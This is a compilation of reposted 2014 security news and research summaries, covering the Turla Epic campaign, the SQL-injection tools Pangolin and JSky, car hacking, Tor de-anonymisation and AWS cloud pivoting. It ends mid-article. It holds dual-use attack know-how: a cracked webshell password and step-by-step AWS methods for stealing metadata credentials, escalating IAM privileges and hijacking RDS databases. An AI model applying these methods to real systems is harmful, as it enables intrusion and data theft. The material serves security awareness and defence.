threat actor behind the "Epic" operation uses mainly hacked servers to host their proxies. The hacked servers are controlled through the use of a PHP webshell. This shell is password protected; the password is checked against an MD5 hash: The MD5 "af3e8be26c63c4dd066935629cf9bac8" has been solved by Kaspersky Lab as the password "kenpachi". In February 2014 we observed the Miniduke threat actor using the same backdoor on their hacked servers, although using a much stronger password. Once again, it is also interesting to point out the usage of Codepage 1251 in the webshell, which is used to render Cyrillic characters. There appears to be several links between Turla and Miniduke, but we will leave that for a future blogpost. Victim statistics On some of the C&C servers used in the Epic attacks, we were able to identify detailed victim statistics, which were saved for debugging purposes by the attackers. This is the country distribution for the top 20 affected countries by victim's IP: According to the public information available for the victims' IPs, targets of "Epic" belong to the following categories: Government Ministry of interior (EU country) Ministry of trade and commerce (EU country) Ministry of foreign/external affairs (Asian country, EU country) Intelligence (Middle East, EU Country) [*]Embassies [*]Military (EU country) [*]Education [*]Research (Middle East) [*]Pharmaceutical companies [*]Unknown (impossible to determine based on IP/existing data) Summary When G-Data published their Turla paper, there were few details publicly available on how victims get infected with this malware campaign. Our analysis indicates this is a sophisticated multi-stage infection; which begins with Epic Turla. This is used to gain a foothold and validate the high profile victim. If the victim is interesting, they get upgraded to the Turla Carbon system. Most recently, we observed this attack against a Kaspersky Lab user on August 5, 2014, indicating the operation remains fresh and ongoing. Note: A full analysis of the Epic attacks is available to the Kaspersky Intelligent Services customers. Contact: intelreports@kaspersky.com We would like to add the following at the end of the blogpost, right before the detection names: Further reading If you'd like to read more about Turla/Uroburos, here's a few recommendations: G-Data's paper "Uroburos Highly complex espionage software with Russian roots" BAE Systems analysis of "The Snake campaign" "Uroburos: the snake rootkit", technical analysis by deresz and tecamac "TR-25 Analysis - Turla / Pfinet / Snake/ Uroburos" by CIRCL.LU Kaspersky products' detection names for all the malware samples described in this post: Backdoor.Win32.Turla.an Backdoor.Win32.Turla.ao Exploit.JS.CVE-2013-2729.a Exploit.JS.Pdfka.gkx Exploit.Java.CVE-2012-1723.eh Exploit.Java.CVE-2012-1723.ou Exploit.Java.CVE-2012-1723.ov Exploit.Java.CVE-2012-1723.ow Exploit.Java.CVE-2012-4681.at Exploit.Java.CVE-2012-4681.au Exploit.MSExcel.CVE-2009-3129.u HEUR:Exploit.Java.CVE-2012-1723.gen HEUR:Exploit.Java.CVE-2012-4681.gen HEUR:Exploit.Java.Generic HEUR:Exploit.Script.Generic HEUR:Trojan.Script.Generic HEUR:Trojan.Win32.Epiccosplay.gen HEUR:Trojan.Win32.Generic HackTool.Win32.Agent.vhs HackTool.Win64.Agent.b Rootkit.Win32.Turla.d Trojan-Dropper.Win32.Dapato.dwua Trojan-Dropper.Win32.Demp.rib Trojan-Dropper.Win32.Injector.jtxs Trojan-Dropper.Win32.Injector.jtxt Trojan-Dropper.Win32.Injector.jznj Trojan-Dropper.Win32.Injector.jznk Trojan-Dropper.Win32.Injector.khqw Trojan-Dropper.Win32.Injector.kkkc Trojan-Dropper.Win32.Turla.b Trojan-Dropper.Win32.Turla.d Trojan.HTML.Epiccosplay.a Trojan.Win32.Agent.iber Trojan.Win32.Agent.ibgm Trojan.Win32.Agentb.adzu Trojan.Win32.Inject.iujx Trojan.Win32.Nus.g Trojan.Win32.Nus.h Technical Appendix with IOCs Sursa: The Epic Turla Operation - Securelist

pangolin Pangolin is a penetration testing, SQL Injection test tool for database security. It finds SQL Injection vulnerabilities.Its goal is to detect and take inform you of SQL injection vulnerabilities in web applications. Once it detects an SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user”s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more. Documentation Pangolin White Paper Pangolin Data Sheet Pangolin User Guide Video Demonstration Inject SQL Server Inject MySQL More Demos Here ScreenShot Pangolin FAQ Click Here Database support: Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase. Pangolin is recommended by many Web security experts all over the world. [TABLE] [TR] [TD]OWASP[/TD] [TD]http://www.owasp.org/index.php/SQL_Injection#References[/TD] [/TR] [TR] [TD]Red Database Security[/TD] [TD]1. Oracle Security Videos 2. http://blog.red-database-security.com/2009/03/05/web-application-testing-with-pangolin-video-screenshot/print/[/TD] [/TR] [TR] [TD]SECURITY DATABASE[/TD] [TD]http://www.security-database.com/toolswatch/Focus-on-Pangolin-SQL-Injection.html[/TD] [/TR] [/TABLE] Features Here is parts of features: HTTPS support Pre-Login Proxy Specify any HTTP headers(User-agent, Cookie, Referer and so on) Bypass firewall setting Auto-analyzing keyword Detailed check options Injection-points management 15 Days Full Function(No Limitation) Trial Sursa: pangolin « NOSEC – Serving More People

jsky What is JSky? JSky is a web vulnerability scanner and web application vulnerability assessment tool. Documentation JSky White Paper JSky Data Sheet JSky Quick Start JSky User Guide ScreenShot Video Demonstration Quick Scan Your Website With NOSEC JSky What can JSky do? JSky is a Web Application Security Vulnerability scanner that can scan for the following Web Application Security Vulnerabilities: * SQL Injection * Cross-Site Scripting * Insecure Indexing * Local path disclosure * Server Misconfiguration * And all we application threats. And JSky is not only a scanner, but also an assessment tool. Why should I use JSky? Look at these features and benefits, we think you will love it right away: 1. Powerful web spider and multi-threaded scanner crawls hundreds of thousands of pages with ease, also supports extract links from JavaScript and flash. 2. Advanced and in-depth SQL injection testing from our Pangolin software, which precisely locates security vulnerabilities. Our software uses proprietary methods that go beyond pattern matching. This is what enables us to be so precise in locating security vulnerabilities. 3. JSky provides both an XML based vulnerability file, and an integrated security vulnerability executive parser. This makes it easy to design a vulnerability test. All you need to do is edit the XML file – no further compatibility coding required. 4. Easy to use. We have worked hard to create a product that does not require advanced internet security knowledge. The value of JSky JSky can inspect all aspects of your Web application, looking for vulnerabilities in your website. Using advanced artificial hacking intelligence, JSky probes your site’s defenses to find the areas that require further attention. JSky lets you see what a hacker would see if he were attacking your site. This knowledge allow you to fix the vulnerability . A few examples of people that will benefit from JSky include: * Penetration tester * Website administrator * And so much more…… Security on web is of the utmost importance. Without Web application testing, credit card transactions can be easily compromised. Thus, processing with credit card,PCI DSS compliance is enforced. Consultant using JSky provide web security service to help you match PCI DSS. System Requirements * 1 GB of memory * 2 GB of free disk space * 1.5 GHz Processor or better * Windows 2000/Windows XP/Windows 2003/Windows Vista/Windows7 Keywords: information security, security on web, web application testing, web applications security, web vulnerability scanner, security assessment, PCI DSS, web security service, vulnerability assessments. 15 Days Full Function(No Limitation) Trial Sursa: jsky « NOSEC – Serving More People

[h=1]PCLinuxOS 2014.07 Arrives with Linux Kernel 3.15.4 and KDE 4.12.3 – Gallery[/h] August 7th, 2014, 11:55 GMT · By Silviu Stahie PCLinuxOS 2014.07, a free Linux distribution aimed at desktop computers and laptops and relying on KDE, has been released with numerous package updates. PCLinuxOS comes with many flavors, but the default is actually KDE. The developers also make a few other versions, like KDE MiniMe, LXDE, or FullMonty, but this is the main one downloaded by most users. The distribution actually follows a rolling release model, which means that new major features and other changes are introduced regularly through the update channel. Every month, the download ISOs are regenerated with the new update, but if you already have the operating system installed you only have to update it regularly. “The KDE MiniMe iso provides a basic KDE desktop and is intended for advanced users who know how to fine-tune their system. To keep this iso small no printer drivers are included. The KDE Full Version ISO provides a standard KDE desktop with many popular applications and out-of-the-box driver support for generic desktop computing,” reads the official announcement. According to the changelog, the Linux kernel now used in the distribution is 3.15.4, which is one of the most recent. It's not exactly top-of-the line, but it's new enough that users won't have any problems with newer hardware. PCLinuxOS is still using KDE 4.12.3, which is a rather old version. The developers of this distro have been using this desktop for quite some time, but an upgrade should arrive pretty soon. Also, Nvidia and ATI fglrx driver support is available, multimedia playback support for many popular formats has been added, the LibreOffice Manager can install LibreOffice supporting over 100 languages, and MyLiveCD allows users to take a snapshot of the installation. The developers have also explained that “in case of low or missing speaker volume users need to click the speaker-icon at the bottom right of the panel, then on ‘Mixer’, and raise the volume sliders.” The system requirements for this interesting OS are quite low, if you want to give it a try. Users will need a modern Intel or AMD processor (preferably for 32-bit), 1 GB or more RAM memory (recommended 4 GB+), 10 GB or more HDD space, and NVIDIA, ATI HD 4000, or better graphics card to enjoy the 3D desktop and all the effects. More details about this Linux distribution can be found in the official changelog. You can download PCLinuxOS 2014.07 right now from Softpedia. A new version of the more complete PCLinuxOS FullMonty should also arrive pretty soon. [h=2]PCLINUXOS - PHOTO GALLERY:[/h] [TABLE=class: news_index_hot] [TR] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [/TABLE] Sursa: PCLinuxOS 2014.07 Arrives with Linux Kernel 3.15.4 and KDE 4.12.3 – Gallery

[h=1]Blackhat 2014[/h] Built binaries for BH2014 Digging for Sandbox Escapes workshop. Link: https://github.com/tyranid/bh2014

Indeed Engineering Blog » Blog Archive Bug Bounty Program: Cash Rewards for Reported Vulnerabilities » Indeed Engineering Blog

Car Hacking Enters Remote Exploitation Phase by Michael Mimoso LAS VEGAS – Charlie Miller and Chris Valasek have proven to be adept backseat drivers. Noted for their car-hacking exploits, Miller and Valasek have gained fame at hacking conferences and on Fox News for forcing automobiles to do their bidding. However, until today’s talk at the Black Hat 2014 conference, the two researchers’ exploits required them to be plugged in directly to their targets, literally sitting in the back seat of an automobile injecting code into its computers. No more. Miller and Valasek delivered a brisk talk explaining the soft spots in automobile networks that open a car up to remote exploit. They also provided a quick overview of specific car makers’ and models’ exploitability and demonstrated their version of an intrusion detection system that blocks some of their remote exploits. “We looked for a big attack surface,” said Miller, a security engineer at Twitter. Remote car attacks don’t look much different than attacks against conventional networks, Miller said. Attackers need a vulnerability in wireless communication protocol, such as Bluetooth, and then take that over in order to have the ability to pass messages to different functions of the car, such as steering or braking. The researchers said that many car manufacturers segment their autos’ internal networks, forcing communication through a centralized bus that would require a hacker to go through two hops in order to force the car to brake hard or take over steering, for example. Some vehicles, such as the Cadillac Escalade 2015, have a radio module that sits on a low- and high-speed bus, they said, enabling a hacker to send messages to both ends if they’re able to get in. “Car hacking is hard,” Miller said. “There’s lots of complexity, and the more technology you introduce, the more problems you have.” Further complicating the scenario is the difficulty in patching automobile software. Valasek said there are significant costs to the manufacturer, not only in producing the patch, but also in contacting customers who then must take their vehicles to a dealer for a software update. “It’s going to be really hard when an exploit comes out and everyone has a vulnerability that needs to be fixed,” said Valasek, director of vehicle security research at IOActive. Once an attacker finds a vulnerability that allows him to send messages over Bluetooth, for example, it’s helpful if the vehicle has a lot of what the researchers call cyber-physical features to exploit. Some of those include self-parking, active lane control, pre-collision systems and adaptive cruise control. All of those require some communication between a sensor and the brakes, acceleration or steering, usually over Bluetooth or some other radio signal. Some features are more inviting to attackers than others. The passive antitheft system, tire pressure monitoring system or remote keyless entry offer a limited attack surface, either because they don’t exchange a lot of data or require close proximity for communication. Bluetooth capabilities, the radio data system and telematics systems that allow cellular or Wi-Fi capabilities, significantly expand a car’s attack surface. Worse, on the horizon are either in-car apps, or connectivity to the Internet via a web browser. “Lots more people know how to write a Web exploit than a TPMS exploit,” Valasek said. “A lot of people can write a malicious app, or pop a browser. If that’s on the same network as your brakes or steering, that’s bad.” “This is growing, and the scariest area,” Miller added. Valasek said his and Miller’s goals for this segment of their research was to look at a broader scope of cars, how they communicate wirelessly to the outside world, and provide a lightweight Consumer Reports-type of rating system. “Why can’t we as an industry start rating automobiles, and hopefully that promotes changes within organizations,” Valasek said. Miller and Valasek said they will release a 95-page paper detailing their findings on a number of new automobiles from Audi, Honda, Infiniti, Jeep, Dodge and others. Sursa: Car Hacking Enters Remote Exploitation Phase at Black Hat | Threatpost | The first stop for security news

Malicious SHA-1 TL;DR: If the four 32-bit constants of SHA-1 can be modified, then exploitable collisions can be constructed. No need to panic, this doesn’t affect the original SHA-1. However, vendors and customers of products with custom cryptography will be interested. Summary This is the webpage of the Malicious SHA-1 project, a research project that demonstrates how the security of the SHA-1 hashing standard can be fully compromised if one slightly tweaks some of the predefined constants in the SHA-1 algorithm. That is, we show that systems using “custom” versions of SHA-1 may include backdoors exploitable by the designers. Such custom versions of cryptographic standards are typically found in proprietary systems as a way to personalize the cryptography for a given customer, while retaining the security guarantees of the original algorithm. The colliding messages constructed can be valid archives files (RAR or 7zip) such that the content of the two archives can be fully controlled. We also build colliding JPEG files, which can be any two images, as in the example below (images were chosen at random): We can also construct colliding executables, with MBR (Master Boot Record) or COM files including arbitrary code. Furthermore, we present polyglot malicious SHA-1 instances, that is, for which the designer can create colliding files of different types with arbitrary content (for example: any two MBR’s, any two RAR archives, and any two shell scripts) The Malicious SHA-1 project was presented in 2014 at the following security and cryptography conferences: BSidesLV (Aug 5; Las Vegas, USA) DEF CON Skytalks (Aug 9; Las Vegas, USA) Selected Areas in Cryptography (Aug 14-15 Montreal Canada) Implications of this research are discussed in our FAQ. More details are given below, and a full description of our work is reported in the research paper. Sursa: https://malicioussha1.github.io/

Blackhat USA Multipath TCP Tool Release & Audience Challenge We hope everyone found something interesting in our talk today on Multipath TCP. We’ve posted the tools and documents mentioned in the talk at: https://github.com/Neohapsis/mptcp-abuse At the end we invited participants to explore MPTCP in a little more depth via a PCAP challenge. Without further ado, here’s the PCAP: neohapsis_mptcp_challenge.pcapng It’s a simple scenario: one MPTCP-capable machine sending data to another. The challenge is “simply” to reassemble and recover the original data. The data itself is not complex so you should be able to tell if you’re on the right track, but getting it exactly right will require some understanding of how MPTCP works. If you think you have it, tweet us and follow us (@secvalve and @coffeetocode) and we’ll PM you to check your solution. You can also ask for questions/clarifications on twitter; use #BHMPTCP so others can follow along. Winner snags a $100 Amazon gift card! Hints #0: The latest version of Wireshark supports decoding mptcp options (see “tcp.options.mptcp”). The scapy version in the git repo is based on Nicolas Maitre’s and supports decoding mptcp options. It will help although you don’t strictly need it. The is an mptcp option field to tell the receiver how a tcp packet fits into the overall logical mptcp data flow (what it is and how it works is an exercise for the user ) It’s possible to get close with techniques that don’t fully understand MPTCP (you’ll know you’re close). However the full solution should match exactly (we’ll use md5sum) Depending on how people do and questions we get, we’ll update here with a few more hints tonight or tomorrow. Once we’ve got a winner, we’ll post the solution and code examples. Sursa: Neohapsis Labs | Blackhat USA Multipath TCP Tool Release & Audience Challenge

[h=1]Kaspersky Warns of Old Windows Flaw That’s Being Aggressively Exploited Right Now[/h] August 7th, 2014, 07:08 GMT · By Bogdan Popa Security vendor Kaspersky has warned today that an old vulnerability in Windows, which has already been patched by Microsoft, is being actively exploited right now by cybercriminals worldwide, so customers should accelerate their patching process to make sure they’re secure. Flagged by Microsoft as CVE-2010-2568, the vulnerability was being used by hackers in cyber attacks against Iran’s nuclear program and was first reported to the software giant in 2010, with a patch released soon after that. “Despite this, Kaspersky Lab detection systems are still registering tens of millions of detections of CVE-2010-2568 exploits. Over the study period, more than 50 million detections on more than 19 million computers worldwide were recorded,” Kaspersky explains. According to the same report, the vulnerability affects all Windows versions on the market with the exception of Windows 8 and 8.1, but given the fact that the majority of users are now running Windows XP and 7, it’s critical to patch these systems as soon as possible. As for the causes that are making exploits possible, Kaspersky says that “it is an error in processing tags in Windows OS enabling the download of random dynamic library without the user’s awareness.” Hackers could thus drop malware on vulnerable computers, which could be then used in new attacks or for spreading malware to even more systems that are yet to be patched. “The first malware exploiting this vulnerability was registered in July 2010. The worm Sality uses this vulnerability to distribute its own code: Sality generates vulnerable tags and distributes them through the LAN. If a user opens a folder containing one of these vulnerable tags, the malicious program immediately begins to launch. After Sality and Stuxnet this vulnerability was used by the well-known Flame and Gauss spyware,” Kaspersky explains. At this point, computers in Vietnam, China, and India are said to be the most vulnerable to attacks because the patch released by Microsoft in 2010 is yet to be installed on these systems. “Vietnam (42.45%), India (11.7%) and Algeria (5.52%) are among the leaders for the number of Kaspersky Lab detections of one of the most dangerous Windows vulnerabilities currently known. Interestingly, according our research, the outdated XP OS is also widely used in all these countries,” it says. Of course, the popularity of Windows XP is still causing issues, as 25 percent of the world’s desktop computers are still said to be running this particular operating system. Microsoft stopped providing support for Windows XP in April 2014, so no other updates and security patches are being released for this OS version. The old CVE-2010-2568 fix is however available via Windows Update. Sursa: Kaspersky Warns of Old Windows Flaw That’s Being Aggressively Exploited Right Now

[h=1]FBI infected PCs on a large scale to persecute alleged criminals[/h] by paganinip on August 7th, 2014 [h=2]A report disclosed by Wired suggests that the FBI is using a malware to identify Tor users by infecting machines on a large scale.[/h] It’s not a mystery that usage of the Tor network represents a problem for investigators of law enforcement agencies and for government entities that need to track users on the popular anonymizing network. Last year the FBI dismantled the Tor hosting service Freedom Hosting in a large scale investigation on child pornography. FBI used a malicious code able to exploit a Firefox Zero-day for Firefox 17 version that allowed it to track Tor users. The malware implants a tracking cookie which fingerprinted suspects through a specific external server. The exploit is based on a Javascript that is a tiny Windows executable hidden in a variable dubbed “Magneto”. Magneto code looks up the victim’s Windows hostname and MAC address and sends the information back to the FBI Virginia server exposing the victims’s real IP address. The script sends back the data with a standard HTTP web request outside the Tor Network. Articol: FBI infected PCs on a large scale to persecute alleged criminals | Security Affairs

Sulo Sulo is a dynamic instrumentation tool for Adobe Flash Player. It is built on Pin. Supported Flash versions The following Flash Player builds are supported: 10.3.181.23 standalone debug 10.3.181.23 standalone non-debug 10.3.181.23 ActiveX 11.1.102.62 standadlone non-debug 11.1.102.62 ActiveX You can add support for another Flash Player build by specifying some RVAs and offsets in FlashPlayerConfigBuilder.cpp. Limitations Sulo supports ActionScript3 method calls only - AVM1 is not (yet) supported. Building The easiest way to build Sulo is to use the sulo_vs2010.sln solution file with Visual Studio 2010. Download Intel Pin kit for Visual Studio 2010 Extract the ZIP Clone Sulo to pin-2.13-65163-msvc10-windows\source\tools\Sulo Open sulo_vs2010.sln and build the solution Plugins Sulo comes with three plugins: Call tracer - logs all ActionScript method calls, including arguments and return values Flash dumper - dumps Flash objects loaded with Loader.loadBytes() to disk SecureSWF - logs decrypted strings from secureSWF-protected files Creating your own plugin is easy: just inherit your class from ISuloPlugin, implement the virtual methods, and add the object to m_plugins in SuloPluginManager::init(). Sursa: https://github.com/F-Secure/Sulo

DeepSec 2013 Talk: Pivoting In Amazon Clouds The „cloud“ infrastructure is a crucial part of information technology. Many companies take advantage of outsourced computing and storage resources. Due to many vendors offering a multitude of services, the term „cloud“ is often ill-defined and misunderstood. This is a problem if your IT security staff needs to inspect and configure your „cloud“ deployment with regards to security. Of course, virtualisation technology can be hardened, too. However the „cloud“ infrastructure brings its own features into the game. This is where things get interesting and where you have to broaden your horizon. Andres Riancho will show you in his talk Pivoting In Amazon Clouds what pitfalls you can expect when deploying code and data in the Amazon Cloud. Classical security tests won’t be enough. The Amazon Elastic Compute Cloud (EC2) is more than just virtual iron. You also get to think about instance life cycles (remember that virtual systems are very volatile), (user) data, AWS Identity and Access management (IAM) roles, and more “meta stuff” attached to your AWS infrastructure. What else is there? Let’s give you some in-depth information from Andres’ talk. EC2 Instance Meta*-Data All EC2 instances have meta-*data, such as the used Amazon Machine Images (AMI), kernel and region. This meta*-data is made available to the instance through a web server (only accessible to that particular instance) which lives at http://169.254.169.254/. Amazon’s meta*-data documentation better explains all the details about the instance meta*-data and how to access it. From the information security perspective the important information available in the meta-*data is: local IP address user data instance profile (AWS API credentials as explained later) Amazon Machine Image (AMI) When creating a new EC2 instance, or defining a launch configuration which will be used together with auto scaling groups, the AWS administrator can provide a script which will be run by the EC2 instance operating system as one of the last boot steps. This script, also called user data, is stored by AWS in the instance meta data and retrieved by the OS during boot. In Ubuntu the cloud*init daemon is responsible from retrieving and running this script. User data scripts are a common way to configure EC2 instances. They install base packages, git client, define variables (for source repositories, etc.), download application source code, compile code, or start required daemon processes. Since in most cases the repository where the instance’s application source code is private, SSH keys are used to access it. GitHub, BitBucket and other widely used source repositories call these “Deploy SSH Keys”. The SSH keys used to access the repository are usually hard-*coded into the user data script, or stored in an alternate location where the script can download them. This represents a risk when, because of a vulnerability, an attacker is able to proxy HTTP GET requests through the EC2 instance which allows him to retrieve the user data script from the meta data. In other words, if there is a way for the attacker to ask any of the services running on the instance to perform an HTTP GET request to arbitrary URLs and then return the HTTP response body to the attacker, then he would get access to the repository URL, branch and SSH keys allowing him to access the application source. The most common vulnerability that allows this type of access is a PHP Remote File Include but any other vulnerable software which allows HTTP proxying could be used to retrieve the meta-*data too. Instance Profiles It is common practice for applications running on EC2 instances to access AWS services like SQS or S3. In order for this to work the application needs to have access to AWS credentials, there are various ways to achieve this, but Amazon AWS recommends using instance profiles. Instance profiles are defined by the AWS architect, who defines which permissions will be available to the EC2 instances using the profile. For example, it is possible to create an instance profile with “SQS:*” permissions which would allow access to all API calls in the SQS service. Once created, the instance profile is associated with an EC2 instance or a launch configuration. When the instances are started AWS creates a unique set of access key, a secret key, and security token and makes them available to the instance through its meta data. Most libraries which consume AWS services, such as boto, know how to retrieve the meta data credentials and use them to access the AWS services. Since the instance profile credentials are stored in the meta*-data, it suffers from the same risks as any other information stored there. Once those credentials are retrieved from the instance, it is possible to use them in any other system with Internet access. The permissions available to the attacker using the stolen credentials will be the same as the AWS EC2 instance, making it very important for the AWS administrator to use the least privilege principle for all AWS permissions. It is also possible to enumerate permissions by use of the nimbostratus tool introduced by Andres. IAM:* Privilege Escalation Amazon’s IAM service is used to manage users, groups, roles and permissions. The permissions assigned to a group or user are fine grained and are usually created using Amazon’s IAM policy generator and then set using Amazon’s IAM service. An Amazon architect can create a custom permission set which would allow access to the different AWS services such as SQS, RDS, EC2 and IAM itself. If special care is not taken by the AWS architect when assigning IAM permissions to a user, he could use IAM API calls to elevate his privileges. Take a look at this example. AWS user Alice only has privileges to access IAM API calls, IAM:* for short Alice uses those privileges to create a new user: Bob Alice creates a new role with permissions to access all AWS services Alice assigns the newly created role to Bob Alice creates access keys for the user Bob Alice accesses any AWS service using Bob’s user To run this attack Alice requires at least these IAM permissions: CreateUser CreateAccessKey PutUserPolicy It is important to notice that it would be also possible to achieve the same goal using other calls to the IAM service, for example it is possible to create a group, assign the policy to that group and then make the newly created user part of the group; or even make Alice part of the new group with high privileges. Using AWS to access Virtualized Database Information One of the most popular services provided by Amazon is RDS, which provides managed SQL databases. RDS reduces the management required by database servers and makes scaling and high availability easy to achieve. SQL databases started from RDS can be managed using two very distinct methods: SQL database root user, connecting to the SQL server port (ie. 3306 in MySQL) Amazon’s RDS API, sending HTTPS requests to the RDS API endpoint Each method allows the user to perform different actions on the database, information and users. Now imagine the following situation: An intruder got access to a set of AWS credentials. The credentials have permissions to access RDS:*. The intruder has no other knowledge nor access to the SQL DB running on RDS. Any knowledgeable intruder will identify three API calls which could be used to access the information stored in SQL databases managed by RDS: CreateDBSnapshot, RestoreDBInstanceFromDBSnapshot and ModifyDBInstance. The steps are trivial: Use CreateDBSnapshot to create a backup of the RDS instance we want to get access to. Use RestoreDBInstanceFromDBSnapshot to create a new RDS instance with all the information from the original one. When the instance is running we’ll still won’t be able to access it using the SQL server port, since we don’t have valid credentials for that. To solve that we call ModifyDBInstance, which will change the “root” user’s password. Using a SQL client (ie. mysql*client in Ubuntu) the intruder can connect to the DB using the “root” user and the credentials set in ModifyDBInstance. Please note that an intruder could also have called ModifyDBInstance on an existing RDS instance and change the “root” password, which could be highly destructive and create a denial of service if the root user is used to access the SQL database from within the application, but also will grant him “root” account access to the SQL server. Tools Andres Riancho will present tools created during his research. These tools allow you to help with the enumeration and exploitation of AWS misconfigurations (which is just another way of saying audit). Who should attend? Anyone seriously working with or considering Amazon Web Services (or any other kind of „Cloud“ infrastructure) has to attend this talk! The „Cloud“ is more than just virtualisation. You have to deal with the additional APIs and details it brings with it. The concepts discussed in this configuration are especially important for penetration testers and auditors who attackinvestigate „Cloud“ infrastructure. Sursa: http://blog.deepsec.net/?p=1548

Documents on Legal Spyware “FinFisher” Leaked August 6th, 2014, 16:58 GMT · By Ionut Ilascu A set of files have been posted online, detailing the capabilities and features of the “FinFisher” spyware suite (also known as FinSpy), a package sold by a German company called Gamma Group, to governments and law enforcement agencies. The documentation was published through a Twitter account that purports to be from the company’s PR department; however, the account, operated by someone with the handle Phineas Fisher, is not affiliated with Gamma Group. The information contained by the files is quite recent, the newest of them are dated April 14, 2014. These are release notes for FinSpyPC and FinSpyMobile 4.51. For the mobile version of the spyware, various communication channels can be monitored (calls, short text messages, multimedia messages) and it allows access to stored data (address book). Moreover, it allows making silent calls in order to listen to the microphone remotely. In another document, it is stated that FinFisher for PC bypasses the detection of almost 40 regularly tested antivirus systems. It is unclear which antivirus solutions the spyware was tested against, but a tweet from Phineas Fisher (@GammaGroupPR) on August 3, showed that Avast’s product could detect its presence on an infected system. An update to the desktop version released in April included modifications that allowed the rootkit component to evade security solutions such as the one from Avast and Microsoft Security Essentials. Another change referred to the Skype module of the malware, “make the appropriate modifications to avoid the popup Skype brings when the Trojan Skype module injects code into Skype.” A list of limitations is also available, and it appears that the modern version (Metro) of Skype is not supported on Windows 8. However, the date of the document is April 14, 2014, and there is a high chance that Gamma Group managed to develop an updated version that eliminates this restriction. The tongue in cheek Twitter account offers links to a list of prices for the legal malware developed for governments. It seems that customers paid almost €1.5 / $2 million for the software package, while practical penetration testing costs reached €27,000 / $36,000. Multiple services and packages are offered, and purchasing all of them could cost a customer close to €3 / $4 million. The mock reason for creating the Twitter account and leaking the documents is that Gamma International ran out of governments to sell their spyware and opened the sales to the public in order to continue their business. Here at Gamma International, we've run out of governments to sell to, so we're opening up sales to the general public! — Phineas Fisher (@GammaGroupPR) August 3, 2014 Sursa: Documents on Legal Spyware “FinFisher” Leaked

Hacking Tor and Online Anonymity Introduction Tor is the acronym of “The onion router”, a system implemented to preserve online anonymity. Tor client software routes Internet traffic through a worldwide volunteer network of servers that hide user information, eluding surveillance of government and other bad actors. The Tor project was born in the military sector, sponsored the US Naval Research Laboratory, and from 2004 to 2005 it was supported by the Electronic Frontier Foundation. Today the software is under development and maintenance of the Tor Project Team. The encryption processes implemented in the Tor Network allow it to protect users’ privacy. Tor traffic is encrypted multiple times passing through different nodes of the network, also known as Tor relays. Law enforcement and Intelligence agencies all over the world are spending a considerable effort to try to break the encryption used with Tor. Practically every government is trying to infiltrate the network to de-anonymize its users. The Tor network is widely used by digital activists and individuals in many critical regions to avoid the Internet censorship operated by governments in China, Syria, Bahrain and Iran. According to Tor Metrics, the number of people worldwide who directly access the anonymizing network is 2.5 million. Figure – Users directly connected to Tor network In this post is an overview of the recent events regarding Tor and the attacks on its infrastructures, with explicit reference to principal initiatives conducted by governments to de-anonymize Tor users. Governments vs Tor Governments are spending great effort to improve monitoring capabilities. Tor networks and other anonymizing networks represent an obstacle to Internet monitoring. Governments sustain that technologies like Tor are abused by cybercrime and terrorists and are a potential source of threats, but organizations for the defense of online privacy and freedom of expression sustain that intelligence agencies are trying to extend their monitoring capabilities over anonymizing networks. Russian Government wants to crack Tor Intelligence agencies declared war on the anonymizing network. Edward Snowden revealed months ago that the US intelligence is worried by possible misuses of the Tor network and was investing to compromise it. Also the Russian government is actively working to try to crack Tor encryption to de-anonymize its users. The Ministry of the Interior of the Russian Federation (MVD) has recently started an initiative to “study the possibility of obtaining technical information about users (user equipment) of Tor anonymous network”. The Russian government has issued a tender to recruit companies and organizations which are interested in developing the technology to track users and their activities within the Tor network. The authorities are offering nearly 4 million rubles, approximately $111,000, for the development of technology to decrypt data sent over Tor and identify Tor users. The tender, titled “Perform research, code ‘TOR’ (Navy),” was posted on July 11th on the official procurement website. Figure – Competition promoted by the Ministry of the Interior of the Russian Federation (MVD) Officially the Kremlin is sustaining similar projects “in order to ensure the country’s defense and security”. Russian intelligence fears that the anonymizing networks could be used by terrorists and foreign intelligence to conspire against the government of Moscow. A few days ago I asked a colleague to help me to translate the original tender, the spelling of “TOP” comes from that original document (all-caps, Russian transliteration). The tender is about Tor indeed and the term “Scientific Production Association” (?????? -???????????????? ???????????) is a Soviet/Russian cover word for a military or a KGB/FSB R&D outlet. The one in question belongs to the Interior Ministry, which is in charge of police and penitentiary. The tender requires active security clearance specifically in the LI (though I wonder if “legal” is applicable to Russia at all) and a general high level security clearance. Every company that desires to participate in the initiative has to pay a 195,000 ruble (about $5,555) application fee. Who is spying on Tor network exit nodes from Russia? The researchers Philipp Winter and Stefan Lindskog of Karlstad University in Sweden presented the results of a four-month study conducted to test Tor network exit nodes for sneaky behavior. The expert noticed that a not-specified Russian entity is eavesdropping on nodes at the edge of the Tor network. The principle on which their investigation is based is the possibility to monitor for exit relays to snoop and tamper with anonymized network traf?c. The researchers have worked to define a methodology to expose malicious exit relays and document their actions. The researchers used a custom tool, a “fast and modular exit relay scanner”, for their analysis, and they discovered that the entity appeared to be particularly interested in users’ Facebook traffic. They designed several scanning modules for detecting common attacks and used them to probe all exit relays. “We are able to detect and thwart many man-in-the-middle attacks which makes the network safer for its users,” they reported in the paper published in their research. Winter and Lindskog identified 25 nodes that tampered with web traffic, decrypted the traffic, or censored websites. On the overall nodes compromised, 19 were tampered with using a man-in-the-middle attacks on users, decrypting and re-encrypting traffic on the fly. Figure – Tor network infiltrated by malicious nodes Tor network anonymizes users’ web experience, under specific conditions, bouncing encrypted traffic through a series of nodes before accessing the web site through any of over 1,000 “exit nodes.” The study proposed is based on two fundamental considerations: User’s traffic is vulnerable at the exit nodes. For bad actors, the transit through an exit node of the traffic exposes it to eavesdropping. The case of WikiLeaks was very popular, which was initially launched with documents intercepted from the Tor network eavesdropping on Chinese hackers through a bugged exit node. Tor nodes are run by volunteers that can easily set up and take down their servers every time they need and want. The attackers in these cases adopted a bogus digital certificate to access the traffic content. For the remaining six cases, it has been observed that impairment resulted from configuration mistakes or ISP issues. The study revealed that the nodes used to tamper the traffic were configured to intercept only data streams for specific websites, including Facebook, probably to avoid detection of their activity. The researchers passive eavesdropped on unencrypted web traffic on the exit nodes. By checking the digital certificates used over Tor connections against the certificates used in direct “clear-web 